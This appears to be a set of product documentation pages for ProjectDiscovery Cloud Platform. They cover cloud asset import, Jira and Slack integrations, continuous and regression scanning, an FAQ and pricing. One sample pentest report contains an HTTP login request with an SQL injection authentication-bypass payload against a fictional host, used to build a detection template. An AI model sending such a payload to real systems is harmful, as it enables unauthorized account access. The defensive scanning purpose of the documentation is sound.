* Specific permissions like “s3:Get\*” and “s3:List\*” ensure that as new resources are added to the target S3 Bucket they will be brought into ProjectDiscovery for inclusion in any scans you create.
5. From the view of the user you just created, navigate to the Security Credentials tab, scroll down to Access Keys and select **Create access key**.
6. Select **Third-party service** and accept the confirmation.
7. A new access key will be generated. **Save the Access Key ID and Secret Access Key in a safe place to add those details to PDCP.**
If you have specific requirements based on your organization's security policies we're happy to help. Reach out to us through [support@projectdiscovery.io](mailto:support@projectdiscovery.io).
## Add your Assets
Now that you have collected the required information from AWS, you can provide these details in ProjectDiscovery Cloud Platform.
1. Navigate to the **Assets tab** and select **Connect Cloud Services**.
2. On the Connect Cloud Services tab, navigate to AWS and select **Connect**
3. Complete the required details:
* Add the Connection Name
* Add the AWS Access Key
* Add the AWS Secret Key
* Optionally add the Session Token
4. Select **Verify** to complete the connection.
## What's Next?
After setting up a connection to Cloud Services use your newly imported assets to [create a scan](/cloud/scanning/createscans).
# Create Tickets for Jira
Create actionable follow up for exploitable vulnerabilities in Jira
## Summary
ProjectDiscovery Cloud Platform has provided you with comprehensive scan results on exploitable vulnerabilities - what's next? You want to get your team involved and have a more seamless pipeline between data visibility, discovery, and follow up.
For your organization this means getting important tasks into Jira!
In this example, we'll walk through setting up this important workflow for a brand new user. You will add assets, configure a Jira integration, and initiate a scan to create a ticket for your team to take action.
### What You'll Do
In this walkthrough we're going to go step-by-step to complete the following actions:
* Add Assets
* Configure Jira
* Configure ProjectDiscovery Cloud Platform for Jira ticketing
* Start a scan to test your new integration
### Prerequisites
To complete the integration you will need to have the correct permissions to access account details within Jira. Refer to [Atlassian's documentation](https://support.atlassian.com/atlassian-account/docs/manage-api-tokens-for-your-atlassian-account/) for additional details.
If you are not a Jira administrator you may need your organization's Jira administrator for assistance in collecting these details.
**You will need the following:**
* Jira instance URL
* Jira Account ID
* Jira email
* Jira API Token
* Jira Project name
## Add Assets
For this example we're going to stick with the simplest path and add assets to your PDCP environment by uploading a .TXT file with the domains you want to include for scanning.
If you already have assets in ProjectDiscovery Cloud Platform, you can skip ahead to Connecting Slack. For for other Asset upload options check out the docs on [Adding Assets.](/cloud/assets/adding-assets)
Navigate to the [Assets tab](https://cloud.projectdiscovery.io/assets) and select **Add New Assets**.
On the Scope tab, use the **Upload files** option to add your .TXT file of domains.
Select your preferred configuration options:
* Auto Discovery is enabled by default, toggle to disable if desired.
* If you choose to leave Auto Discovery enabled, select your desired frequency.
* Navigate to the Advanced tab to modify individual discovery settings for subdomains, open ports, etc.
Select **Add Assets** to complete the setup.
Once your assets, you will need to connect your ProjectDiscovery Cloud Platform to your Jira account.
If you have questions on Assets - check out the [Assets - FAQ](/cloud/assets/overview#faq).
## Connecting Jira
After adding your assets, you will need to connect your ProjectDiscovery Cloud Platform environment to Jira. There are two parts to this, the part you will need to complete in your Jira environment and the details you'll need to add to ProjectDiscovery Cloud Platform.
### Jira Setup
Logged in to Jira as an administrator visit [this link](https://id.atlassian.com/manage-profile/products) to locate your Jira instance URL.
You can also [use the REST API](https://developer.atlassian.com/cloud/jira/platform/rest/v3/) to obtain these details.
*Note: The format for URLs in Jira will vary depending on your account type (Jira Cloud vs on-prem)*
Log in to your Jira account and locate the following information:
* Jira instance URL
* Jira Account ID
* Jira Project Name
*Note: To locate your Jira instant URL - Click your Profile menu in the upper-right, then select **Profile**. In the URL after /people/ is your account ID.*
**Save this information in a safe place.**
* Logged in as a Jira administrator navigate to [https://id.atlassian.com/manage-profile/security/api-tokens](https://id.atlassian.com/manage-profile/security/api-tokens).
* Click **Create API token**.
* In dialog that appears, enter a memorable label for your token and click **Create**.
* Click **Copy to clipboard**, and save this information in a safe place.
Next up, you will be adding these details from Jira to your environment in ProjectDiscovery Cloud Platform!
### ProjectDiscovery Cloud Platform Setup
Before getting started with this part of the setup ensure that you have completed the configuration required in Jira.
Navigate to **Scans → Configurations** and under Ticketing select Connect under the option for Jira.
In PDCP complete the information for Jira including:
* A name for your Jira Configuration
* Jira instance URL
* Jira account ID
* Jira Email
* Jira API Token
* *(Optional) Select Enable for all scans option if desired (you can also select this option during scan creation)*
* Select **Next** to continue the Jira integration setup.
* Provide the **Jira Project name** for the project in which you want to create issues from ProjectDiscovery Cloud Platform.
* Provide the **Jira Issue type** you want to have created.
* Add the Closed status. (Default is "Done" but this field can be edited)
* Choose your preferred options (toggle) for **Severity** and **Deduplication**.
* Add any Custom field details you want to include.
* Refer to [an example on custom fields from ProjectDiscovery](/tools/nuclei/running#nuclei-reporting) (*scroll to Jira*)
* Review Atlassian's documentation on [creating custom fields](https://support.atlassian.com/jira-cloud-administration/docs/create-a-custom-field/), or [locating existing custom field IDs](https://confluence.atlassian.com/jirakb/how-to-find-any-custom-field-s-ids-744522503.html).
Once you're satisfied with your configuration select **Verify** to complete your Jira integration.
Now that your configuration is set up, you can create a scan and verify your Jira integration.
## Create a Scan
The final step is to create a scan, verify that your Jira integration is set up correctly, and check for the corresponding ticket in the Jira project you configured.
From the Scans tab select **Create New Scan** to open the creation workflow.
* Select from the Assets we added in the first step.
* Choose the templates or template profile you want to use for scanning. *For this example we suggest keeping the Recommended template profile.*
Provide a name, select a scan frequency, and complete any additional configurations (integrations, configurations, or variables).
Click **Create Scan** to start your new scan. This scan will be added to the Scans page with an in-progress status until it completes and provides the results of the scan with any vulnerabilities.
Check your Jira project to verify that your alert is working as expected!
## What's Next?
This example focuses on the process of integrating with Jira to create tickets for your team based on scan results.
ProjectDiscovery Cloud Platform also supports workflows for alerting for Slack, MS Teams, Email and custom webhooks.
Check out another example that sets up a workflow to create a scan and [sends out a Slack alert.](/cloud/examples/slackalert)
# Continuous Scanning
Protect your attack surface by enabling a continuous vulnerability scan
## Summary
PDCP scanning focuses on providing speed and accuracy around the vulnerabilities we identify. We want to ensure that you results are not filled with noise and help focus on the exploitable vulnerabilities that reflect the greatest risk.
To set up continuous scanning you will need:
* The assets you care about. Check out our [What is exposed?](/cloud/examples/addassets) use case to add your assets.
* A scan schedule to check for recent changes that may reflect new vulnerabilities.
* Notifications to your preferred channels (Ticketing or Alerts!) *By default, these alerts are sent to email.*
* Check out the [Scan Integrations](/cloud/scanning/integrations) for details.
With these things configured, the Cloud Platform can continuously run scans for you to keep your environment protected.
## Create a Continuous Scan
Follow the steps below to create a new continuous scan.
*Note: To include an alert or ticket creation as part of the scan you will need to
have configured an integration. You can add an integration during the scan setup below or update an existing scan to add the integration.*
Navigate to [https://cloud.projectdiscovery.io/scans](https://cloud.projectdiscovery.io/scans) and select **Create New Scan** to open the scan creation workflow.
Select (or add) the assets you want to include in your scheduled scan.
Click **Next** and select the templates you want to use for this scan.
Give the scan a name and select your scan frequency to configure how often you want this scan to run.
* *You have to set up a schedule to enable a continuous scan.*
Select **Integrate** to choose an existing Integration, or configure the new integration you want to use with this scan.
* *You can also update this scan after it is created to add the Integration.*
## What's Next?
Once your scan has completed successfully the scan results will be available on the main **Results** tab as part of your full results.
Select the individual scan you just created from the **Scans** page to see the results for the individual scan.
Explore these results to learn more about any vulnerabilities we identified and the details around the timing, templates, severity and more.
# Custom vulnerability automation
Incorporate your internal reports to build custom automation
## Summary
Every organization is unique in their tech stack composition. You need to detect and remediate a whole range of vulnerabilities that are not just limited to publicly known attacks.
Our Cloud platform can automate scanning for almost any kind of vulnerability, including those you know about internally, across your environments.
Review this use case to walk through an example to create a template for custom automation.
## Custom automation
Imagine your penetration testing team found a critical vulnerability on `app.hooli.com`. Now, you want to inspect to look for this vulnerability on your other instances or ensure it does not reappear in the future on the same app:
### Example
```
SQL Injection vulnerability in app.hooli.com/login. This vulnerability can potentially allow an attacker to bypass our authorization system and gain access to any given user account. This is a very critical vulnerability that needs to be patched.
HTTP Request:
POST /login HTTP/1.1
Host: app.hooli.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
username=admin&password=' OR '1'='1
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome back, admin
...
The application improperly handles user input in the password field, leading to an SQL Injection vulnerability.
```
### Create a Custom Template
Follow the steps below to build a custom template and automation.
Navigate to [https://cloud.projectdiscovery.io/templates](https://cloud.projectdiscovery.io/templates) and select **Start with AI** to open the workflow.
Paste your template and click **Generate** to build a new custom template.
* This will take a moment to create a new template.
* *Use the example above to test this functionality out.*
Our template language is easy and versatile, allowing you to write nearly any type of vulnerability test.
* To make additional edits check out our [templates doc](/templates/introduction) to learn more.
Navigate to [https://cloud.projectdiscovery.io/scans](https://cloud.projectdiscovery.io/scans) and select **Create New Scan** to open the workflow to create a new scan using the template
you just created.
## What's Next?
This workflow can quickly turn your internal vulnerability knowledge into continuous scans.
Monitor across your tech stack to see its match and re-appearance after the fix. This approach helps identify similar matches and reappearances after implementing fixes.
Through these customizations you can easily build a security monitoring system that expands upon the expertise and data of your security teams.
* Review [scanning basics](/cloud/scanning/overview)
* Explore [continuous scanning](/cloud/examples/continuousscan)
* Check for a [trending vulnerability](/cloud/examples/trending)
# Generate Alerts in Slack
Keep your team informed of important vulnerabilities in Slack
## Summary
One of the most common security workflows focuses on making sure your team has visibility into potential exploits. Discovering an exploitable vulnerability is only one part of the process.
The next critical step is to alert your team so they can take action to triage and work towards remediation.
In this example, we'll walk through setting up ProjectDiscovery Cloud Platform (PDCP) to establish this important workflow to ensure that your team can act on any information the scan reveals to defend your infrastructure.
## What You'll Do
In this walkthrough we're going to go step-by-step through the entire process and complete the following actions:
* Add Assets
* Configure Slack
* Configure ProjectDiscovery Cloud Platform for Slack alerts
* Start a scan to test your new alert
## Add your Assets
For this example we're going to stick with the simplest path and add assets to your PDCP environment by uploading a .TXT file with the domains you want to include for scanning.
If you already have assets in ProjectDiscovery Cloud Platform, you can skip ahead to Connecting Slack. For for other Asset upload options check out the docs on [Adding Assets.](/cloud/assets/adding-assets)
Navigate to the [Assets tab](https://cloud.projectdiscovery.io/assets) and select **Add New Assets**.
On the Scope tab, use the **Upload files** option to add your .TXT file of domains.
Select your preferred configuration options:
* Auto Discovery is enabled by default, toggle to disable if desired.
* If you choose to leave Auto Discovery enabled, select your desired frequency.
* Navigate to the Advanced tab to modify individual discovery settings for subdomains, open ports, etc.
Select **Add Assets** to complete the setup.
Next, you will need to connect your ProjectDiscovery Cloud Platform to the Slack channel where you want to receive alerts.
## Connecting Slack
After adding your assets, you will need to connect your ProjectDiscovery Cloud Platform environment to your Slack.
There are two parts to this, configuring your Slack environment, and configuring ProjectDiscovery Cloud Platform with your Slack details.
### Slack Setup
Need help? Refer to [Slack's documentation](https://api.slack.com/messaging/webhooks) on webhooks for additional details.
From your Slack environment, use [this link](https://api.slack.com/messaging/webhooks) to open the steps for creating an incoming webhook.
Under the first step 1. Create a Slack app, click the **Create your Slack app** button
* Choose **From Scratch**
* Provide your Slack App with a Name
* Pick your workspace
* Select **Create app**
Under **Building Apps for Slack** select the Incoming Webhooks option
Toggle the option to **Activate Incoming Webhooks** and once enabled select the **Add New Webhook to Workspace** option.
* Select a channel to configure for the Webhook integration.
* Once you've identified a channel, Slack sends a test message to let you know there is a new integration.
Copy the **Webhook URL** you generated and save this information to add to your ProjectDiscovery Cloud Platform integration settings.
### PDCP Setup for Slack
*Before getting started with this part of the setup ensure that you have completed the configuration required in Slack and have your Webhook URL and Username details available.*
Navigate to **Scans → Configurations**. Select Alerting and then **Connect** under the option for Slack.
* Provide a name for your Slack configuration
* Provide the webhook you created in Slack for PDCP
* Provide a username for your Slack configuration (*Optional*)
Select the Events that you want to trigger notifications from ProjectDiscovery Cloud Platform to your Slack channel.
Select **Verify** to finalize your configuration.
Now that your configuration is set up, create a scan and verify your alert in Slack.
## Create a Scan with Alert
The final step is to create a scan, verify that your Slack integration is set up correctly, and check for the alert to the Slack channel you configured.
From the Scans tab select **Create New Scan** to open the creation workflow.
* Select from the Assets we added in the first step.
* Choose the templates or template profile you want to use for scanning. *For this example we suggest keeping the Recommended template profile.*
Provide a name, select a scan frequency, and complete any additional configurations (integrations, configurations, or variables).
Click **Create Scan** to start your new scan. This scan will be added to the Scans page with an in-progress status until it completes and provides the results of the scan with any vulnerabilities.
Check your Slack channel to verify that your alert is working as expected! You should see something similar to the image here.
## What's Next?
This example walks through integrating with Slack to alert your team about Scans. If you're interested in other options ProjectDiscovery Cloud Platform also supports alert workflows for Microsoft Teams, Email, and custom webhooks.
For even more integrations, check out our other Use Cases.
# Defend against trending vulnerabilities
Take action when you learn about popular attacks.
## Summary
When you hear about [a popular attack](https://techcrunch.com/2024/02/26/researchers-say-easy-to-exploit-security-bugs-in-connectwise-remote-access-software-now-under-mass-attack/) on the news
you obviously want to see if your organization is at risk for the vulnerability.
In this example you will quickly set up a scan to search across your infrastructure for a trending vulnerability.
## Scan for a vulnerability
Navigate to [https://cloud.projectdiscovery.io/templates](https://cloud.projectdiscovery.io/templates). Click on the sidebar to expand the view and search for the trending vulnerability `CVE-2024-1709`.
Your search found the [appropriate template.](https://cloud.projectdiscovery.io/public/CVE-2024-1709). Open it to view the template details under **Target**.
Click on **Target list** and then **Add more** to choose the assets you want to scan.
* Add new assets, select existing assets, or use the assets you added in the [earlier example.](/cloud/examples/addassets)
Click **Scan now** to initiate a new scan.
* *You can also **Update** this scan after it's created to modify the schedule or add an Integration.*
## What's Next?
Once your scan has completed review the details under the main **Results** tab as part of your total system results, or
select the individual scan to explore the specific scan and learn if your environment is impacted by this trending vulnerability!
As a next step you could:
* Update the scan to recur on a weekly basis
* Export those results to share with your organization
* Add a notification to your scan to alert your team on Slack or Microsoft Teams
# Vulnerability Regressions
Continuously retest vulnerabilities and detect similar issues across your infrastructure.
## Summary
As organizations uncover more vulnerabilities than ever before, managing and remediating critical security vulnerabilities becomes increasingly complex. Traditional workflows often involve fragmented tools and processes, making it challenging to ensure vulnerabilities are effectively resolved and do not reappear.
Recognizing these challenges, we have added a powerful feature to our cloud platform (currently in BETA): Vulnerability Regression with Nuclei.
This feature seamlessly integrates with your preferred ticketing solutions—GitHub, GitLab, Linear, and Jira—to streamline vulnerability management. By automatically generating Nuclei templates from reported vulnerabilities and continuously retesting during the remediation process, it ensures that security issues are effectively fixed.
### How It Helps
* **Automates Template Creation**: Transforms reported vulnerabilities into actionable Nuclei templates using AI, saving time and reducing manual effort with ability to quickly edit the attached templates.
* **Continuous Retesting**: Automatically retests vulnerabilities when developers attempt to close issues, ensuring fixes are properly applied, and includes continuous monitoring of previously fixed vulnerabilities to file a ticket as soon as they reappear in production.
* **Infrastructure-wide Detection**: Identifies similar vulnerabilities across all assets, preventing overlooked threats and reducing the risk of reoccurrence.
### Request a Demo
[Contact us to here](https://projectdiscovery.io/request-demo) to request a personalized demo.
Learn how ProjectDiscovery can help your team save time, improve remediation efficiency, and strengthen your organization's security posture for critical vulnerabilities.
# Key Benefits
Learn more about the key benefits of using ProjectDiscovery Cloud Platform
## What are ProjectDiscovery Cloud Platform's key benefits?
With a portfolio of so many popular and successful open source tools, our prospects and users often ask about the key benefits of using ProjectDiscovery Cloud Platform. Explore some of the main benefits and advantages of PDCP below.
### Faster, Cloud-hosted Scans
As a cloud-hosted offering, PDCP abstracts away the complexities of running Nuclei and other ProjectDiscovery open source tools at scale.
Our cloud scanning engine is **50x faster than Nuclei**, completing scans of up to 20,000 targets in less than an hour.
This delivers scan results significantly faster and saves teams meaningful time that would otherwise be spent on maintaining infrastructure, writing custom scripts, and waiting for scan results to complete.
### Collaboration
Security is a team effort and open source tools can make it difficult to collaborate with teammates. ProjectDiscovery Cloud Platform provides users with a shared workspace to run vulnerability scans, view results, and triage findings. PDCP also includes role-based access control so security teams can invite engineers and other stakeholders to the platform in view-only roles.
### Tons of Automation
ProjectDiscovery Cloud Platform was designed to automate the key workflows of the modern security team. Asset discovery and reconnaisance has been simplified from chaining multiple open source tools into one simple step. Automatically scan for newly released Nuclei templates, or set up regression tests for fixed vulnerabilities. Schedule daily discovery and scans, or set up custom schedules, continuous scanning, or workflow-based scans. Key actions like copying cURL requests, opening up vulnerable targets in a new tab, and initiating retest are all exposed to the user, saving multiple clicks and navigating between different applications.
### Powerful Integrations
ProjectDiscovery Cloud Platform makes it easy to connect your key services and applications. PDCP supports integrations to your favorite messaging apps like Slack to be alerted of critical findings, ticketing systems like Jira to automate the remediation process and initiate retests, and cloud providers to pull in your live hosts for scanning. We also have a fully functional [API](https://docs.projectdiscovery.io/api-reference/introduction) to customize any integrations in your organization.
### Dashboards and Executive Reporting
Showcase your security initiatives to leadership with beautiful dashboards and executive reports. Export vulnerability findings via PDF, JSON, or CSV. Leverage our real-time vulnerability scans to automatically scan your infrastructure for trending exploits and share findings proactively with your company.
### Support
Direct access to the ProjectDiscovery team for support on optimal configurations, writing advanced custom templates, and anything else you need to ensure ProjectDiscovery Cloud Platform meets your security needs.
# PDCP FAQ
Frequently Asked Questions about ProjectDiscovery Cloud Platform
Sign up for [ProjectDiscovery Cloud
Platform](https://cloud.projectdiscovery.io/)
## Summary
Check out the Frequently Asked Questions on this page to learn about general usage for ProjectDiscovery Cloud Platform (PDCP). We cover topics around data, system settings and administration, and pricing info.
### Other FAQs
Are you looking for details about certain features? Check out our feature-specific FAQs for additional details.
* [Assets FAQ](cloud/assets/overview#faq)
* [Scanning FAQ](/cloud/scanning/overview#faq)
* [Nuclei Templates FAQ](/cloud/editor/faq)
Questions about the product that you don't see covered here - we want to know!
Contact [support@projectdiscovery.io](mailto:support@projectdiscovery.io) with any recommendations or issues.
## General
You can find our [terms of use](https://projectdiscovery.io/terms) here.
Our Cloud Platform is engineered for security and DevOps teams. Please include scan headers, whitelist your scan activities with your IT team, and limit scanning to authorized assets.
If you have questions, don't hesitate to reach out - [support@projectdiscovery.io](mailto:support@projectdiscovery.io)!
*Note: Unauthorized scans that lead to abuse reports will result in account suspension.*
ProjectDiscovery Cloud Platform works best on chromium-based browsers.
For questions about ProjectDiscovery Cloud Platform first we recommend exploring our Documentation. Trigger our AI-based search with a question or phrase.
If you can't find what you need here - [email us](mailto:support@projectdiscovery.io), we're here to help!
Yes, with a Pro subscription you can have up to 10 team members. If you need support for a larger team, [get in touch](mailto:sales@projectdiscovery.io) and we'll be happy to talk about a custom setup.
ProjectDiscovery treats all vulnerability data and custom templates as private customer data. We do not share or sell this data and maintain strict protocols internally to limit access to your data.
This also applies to any information entered into our [AI template editor](/cloud/editor/overview). We are SOC 2 compliant and our latest security reports can be requested from our Trust Center at security.projectdiscovery.io.
ProjectDiscovery Cloud Platform data resides with our cloud infrastructure partners. We maintain several relationships with leading global cloud providers.
We are SOC 2 compliant and our latest security reports can be requested from our Trust Center at security.projectdiscovery.io.
We are working on an on-prem version of our Cloud Platform. Get in touch with us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io) to share more about your requirements and learn about our product roadmap for upcoming features.
## Pricing
Our Pro plan enables users to scan up to 1,000 unique assets per month. If you need higher scanning capacity for your workflows, please contact us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
A unique asset is a combination of host (subdomain or IP) and port. Once scanned, you can rescan any asset again without extra cost for the rest of the month.
Once you reach your limit, you will not be able to scan additional unique assets until your limits reset at the start of the next billing month.
You will be notified prior to running a scan if your scan exceeds the remaining count of unique assets in your billing month. You will have the option of proceeding with that scan and we will scan as many new unique assets as possible up to your limit.
You can also reconfigure your scan with fewer assets by applying filters to an asset group and clicking on “Start Vulnerability Scan” or deleting assets from an asset group by scrolling to the right and clicking on the kebab menu and “Delete”.
If you need higher scanning capacity for your workflows, please contact us at [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
For new users, visit [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) to sign up.
For existing users, visit **Settings –> Billing** to set up your subscription.
Changes to subscriptions are available in the Billing section of the Settings
page. If you are the team owner, you will also be able to view past invoices
under the Billing section of the Settings page.
You can cancel in the Billing section of the Settings page at any time.
Unfortunately, we do not offer full or partial refunds. If you have issues or
questions, contact
[support@projectdiscovery.io](mailto:support@projectdiscovery.io) and we will
do our best to help you out.
Our primary payment method is via credit card invoiced in USD. For ACH payments or other custom payment requirements, please reach out to [sales@projectdiscovery.io](mailto:sales@projectdiscovery.io).
# Introducing ProjectDiscovery Cloud Platform
Sign up for [ProjectDiscovery Cloud Platform](https://cloud.projectdiscovery.io/)
## What is ProjectDiscovery Cloud Platform?
[ProjectDiscovery Cloud Platform (PDCP)](cloud.projectdiscovery.io) is a cloud-hosted security platform engineered to detect exploitable vulnerabilities and misconfigurations across your internal and external infrastructure at scale with zero false positives.\
Powered by a global open-source community of over 100,000 security professionals, PDCP is built with our most popular tools like Nuclei to bring next-generation reconnaissance, vulnerability detection, and remediation automation to the modern security team.
If you're new to ProjectDiscovery:
* Get started with a [free PDCP account](cloud.projectdiscovery.io)
* Learn about the [key benefits](/cloud/features) of Cloud
* New to Nuclei? Check out a hands on example of [our popular open source tool Nuclei](/getstarted-overview)
* Explore more of our [open source tools](/tools/index)
## How are we different?
The security space is crowded with tools. Attack surface management, vulnerability management, exploit monitoring - what solutions do you need?
As concerns around security rise, organizations are increasingly shifting their attention to managing these risks.
Let's get into the details and learn more about *why* ProjectDiscovery Cloud Platform is different.
### Zero noise
Eliminate false positives with our modern vulnerability scanning engine, powered by Nuclei and [Nuclei templates](https://github.com/projectdiscovery/nuclei-templates).
Each template replicates the specific actions a hacker would take to validate an exploit with clear matcher logic.
This stands in contrast to traditional scanners that often rely on **version-based** checks that frequently generate false positives.
Our accuracy saves security teams hours of wasted triaging effort and enables teams to focus their efforts on remediating the vulnerabilities that matter.
### More Transparency
Nuclei templates offer clear visibility into how vulnerabilities are detected with logical mathers and easy-to-follow YAML syntax. These templates carry comprehensive information about each vulnerability including descriptions, severity, reference links and remediation steps. PDCP also comes with fast and easy workflows to retest findings or replicate results. Learn more about our [Nuclei templates](https://docs.projectdiscovery.io/templates/introduction).
### Full Customization
No two organizations are identical, and neither are their security needs. Modern security teams need to full control over their scanning workflows to get the most out of their vulnerability management program. PDCP provides users with the flexibility and customization to decide what assets to scan and which Nuclei templates to run including custom schedules, headers, and even alerts and ticketing automation.
### Community Powered
Unlike traditional proprietary security companies, ProjectDiscovery began as an open-source company and today we leverage the expertise of over 100,000 security professionals worldwide to build great security tooling. When a new CVE like Log4J emerges, community contributions to our Nuclei Templates project are often available [within hours of a public proof of concept (PoC)](https://blog.projectdiscovery.io/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities/).
PDCP's Nuclei template detection library today includes over 9,000 templates contributed from our community, every single one of which is reviewed by our internal team for quality and accuracy.
As one ProjectDiscovery customer puts it, “When we work with ProjectDiscovery, we work with the best hackers in the world.”
### A Detection Platform for All Security Risks
Not all security risks are publicly documented CVEs found in the National Vulnerability Database (NVD). In addition to covering the most common CVEs and misconfigurations, our Nuclei templates also detect exposed panels, default logins, leaked credentials, and many other security risks. Also, with our [AI Template Editor](https://docs.projectdiscovery.io/cloud/editor/ai), you can easily generate custom Nuclei templates to convert bug bounty reports, internal pentest findings, and other vulnerabilities into automatable security checks to run regularly against your infrastructure. Read about how [if you’re not writing custom Nuclei templates, you’re missing out](https://blog.projectdiscovery.io/if-youre-not-writing-custom-nuclei-templates-youre-missing-out/).
### Powerful Reconnaissance
Vulnerability results are only as good as the scope of the vulnerability scan. PDCP's asset discovery and reconnaissance workflow leverages over 6 different open source tools to provide comprehensive enumeration of your external perimeter. Try our discovery capabilities by entering your domain [here](projectdiscovery.io).
### Enterprise Integrations and Capabilities
ProjectDiscovery Cloud Platform includes a host of enterprise capabilities and integrations to automate your workflows within your organization. Our integrations include 2-way ticketing sync to initiate retests from your ticketing platform of choice, alerting in your favorite messenging app like Slack or via email, and connections to your cloud providers to import current hosts for scanning. PDCP also enables users to whitelist scan traffic by IP, enforce rate limiting, scan internal CI/CD pipelines, export executive reports on findings and risk posture, and meet compliance frameworks like SOC2, PCI, HIPAA. We also include enterprise features like SSO SAML, role-based access control, and audit logs in our platform.
# Scans and vulnerabilities
A high-level user guide for creating a scan and reviewing vulnerabilities
Scans are at the heart of the ProjectDiscovery Cloud Platform (PDCP).
After [adding assets](/cloud/assets/adding-assets), select the templates you want to use, and complete the scan details to start checking your tech stack for exploitable vulnerabilities.
On Scans, the three sections (sub-tabs) are Scans, Results, and Configurations.
* **Scans** - view all of the scans you, or your team created.
* **Results** - a summary of all scan results in a unified view.
* **Configurations** - explore integrations for alerting and ticketing, scan settings, and template options. (Check out the [Integrations page](/cloud/scanning/integrations) for details.)
## Scans
The Scans tab provides a summary of your scan data and displays a list of all of your created scans. These results can be explored using search and filtering.
The Scans section also includes the **Create Scan** and **Connect to local Nuclei** options.
For examples of common scanning workflows check out our [Use Cases.](/cloud/usecases)
### Creating a Scan
From the Scans tab select **Create New Scan** to open the creation workflow.
For advanced scan configurations, check out [Integrations](/cloud/scanning/integrations) we support for Jira, Slack, and more.
Select from existing Assets or add new assets.
Choose the templates you want to use for scanning.
* Template Profiles (groups of templates for a specific category)
* Custom Templates (from the full Nuclei template library or any custom templates)
Provide a name, select a scan frequency, and complete any additional configurations (integrations, configurations, or variables).
Click **Create Scan** to start your new scan. This scan will be added to the Scans page with an in-progress status until it completes and provides the results of the scan with any vulnerabilities.
Want to connect your existing Nuclei scan? Check our [our documentation](/cloud/scanning/nuclei-scan) on those steps here.
### Automatic Real-Time Vulnerability Scan
PDCP now offers an automatic real-time vulnerability scanning feature:
* **Instant Template Updates**: The system automatically triggers vulnerability scans whenever new Nuclei templates are added to the platform.
* **Immediate Detection**: This ensures immediate detection of the latest vulnerabilities as soon as they are released.
* **Stay Ahead of Threats**: By leveraging this feature, you can stay ahead of potential threats by identifying new vulnerabilities in your assets as soon as detection methods become available.
To enable automatic real-time vulnerability scanning:
1. Navigate to the [Dashboard](https://cloud.projectdiscovery.io) page.
2. Look for the "Automatic Real-Time Scanning" option to enable.
3. Select your asset groups to configure for Automatic Vulnerability Scan.
### Automatic Discovery with Vulnerability Scan
PDCP now allows you to enable automatic asset discovery before running vulnerability scan.
* **Automatic Discovery**: You can choose to automatically run asset discovery before scanning.
* **Immediate Scanning**: You can opt to initiate a vulnerability scan immediately after asset discovery completes.
* **Flexible Configuration**: These behaviors are configurable, allowing you to enable or disable automation based on your specific requirements.
To configure discovery and scan automation:
1. Go to the [Scans](https://cloud.projectdiscovery.io/scans) page.
2. Find the "Automatic Discovery" option and adjust it according to your preferences.
3. If you've enabled automatic discovery, automatic asset discovery will be performed before vulnerability scan.
These new automation features provide greater flexibility and ensure your security posture remains up-to-date with minimal manual intervention.
## Results (Vulnerabilities)
### All Scans
The main **Results** section of Scans displays the summarized results of all the scans in your environment.
Your results can be explored and refined through the categories (Vulnerabilities, Info, Affected Assets) or through filtering (Status, Severity, Host)
### Individual Scans
To view the results of an individual scan, select that scan from the Scans page by clicking on the name. This displays the results of that scan and includes categories (Vulnerabilities, Info, Affected Assets) or filtering (Status, Severity, Host) to explore the details of the individual scan.
Select the **Logs** tab to view scanning logs with information around time, assets, detection template, and match results. The Logs also include error information to assist with any troubleshooting.
### Vulnerabilities
From the results view (all or individual) selecting a vulnerability expands to show you the complete details including the template(s), assets, and detection information. From the results page you can:
* Export your vulnerabilities (JSON, CSV, PDF)
* Modify the status of the vulnerabilities (false positives/closed)
* Retest individual vulnerabilities
* Review the template used to identify vulnerabilities
Click on the individual vulnerability to review detailed information, including remediation recommendations.
### Configurations
Configurations is where all of our [scanning-based integrations](/cloud/scanning/integrations) are available. The Configurations section includes individual pages for each category outlined below:
* **Alerting** - currently supports integrations with Slack, MS Teams, Email, and Custom Webhooks. These great features can connect the scanning data with your teams through automation.
* **Ticketing** - currently supports integrations for Jira, GitHub, and GitLab. Use these integrations to create something as simple as an email notification, or integrate with Jira to create tickets based on your scan results.
* **Scan** - configure custom http headers, template variables, and custom interactsh server for your scans.
* **Template** - review our built in template configurations or create a new template configuration with template filters to include or exclude based on severity, tags, protocol, and template ID
# Scan Integrations
A high-level user guide around integrations for scanning including alerts and ticketing
## Summary
ProjectDiscovery Cloud Platform (PDCP) includes integrations for several third-party tools with different user goals in mind.
This includes tools that can keep your team up to date with real time alerts from applications like Slack, Microsoft Teams, and more.
PDCP can also help automate the remediation process with direct integration to ticketing systems like Jira and GitHub.
Visit the [Scans --> Configurations](https://cloud.projectdiscovery.io/scans/configs) section of PDCP to explore and configure your integrations.
Check out our [Scans and Vulnerabilities](/cloud/scanning/createscans) documentation for high-level information on creating a scan and reviewing your vulnerabilities.
## Alerting Integrations
Alerting integrations support notifications as part of scanning and include Slack, Microsoft Teams, Email, and custom Webhooks.
### Slack
PDCP supports scan notifications through Slack. To enable Slack notifications provide a name for your Configuration, a webhook, and an optional username.
Choose from the list of **Events** (Scan Started, Scan Finished, Scan Failed) to specify what notifications are generated. All Events are selected by default
* Refer to Slack's [documentation on creating webhooks](https://api.slack.com/messaging/webhooks) for configuration details.
### MS Teams
PDCP supports notifications through Microsoft Teams. To enable notifications, provide a name for your Configuration and a corresponding webhook.
Choose from the list of **Events** (Scan Started, Scan Finished, Scan Failed) to specify what notifications are generated.
* Refer to [Microsoft’s documentation on creating webhooks](https://learn.microsoft.com/en-us/microsoftteams/platform/webhooks-and-connectors/how-to/add-incoming-webhook?tabs=newteams%2Cdotnet) for configuration details.
### Email
PDCP supports notifications via Email. To enable email notifications for completed scans simply add your recipient email addresses.
Check out a sample email below.
### Webhook
PDCP supports notifications via custom Webhook. This functionality supports posting events from any user-defined endpoint based on your environment and system requirements.
To enable webhook notifications for completed scans provide a config name, webhook URL, and the required authentication details.
For example, send a custom webhook to an internal alerting system in this format:
`https://example.com/hook/alert`
## Ticketing
The integrations under Ticketing support ticketing functionality as part of scanning and include support for Jira, GitHub, GitLab, and Linear.
### Jira
PDCP provides integration support for Jira to create new tickets when vulnerabilities are found.
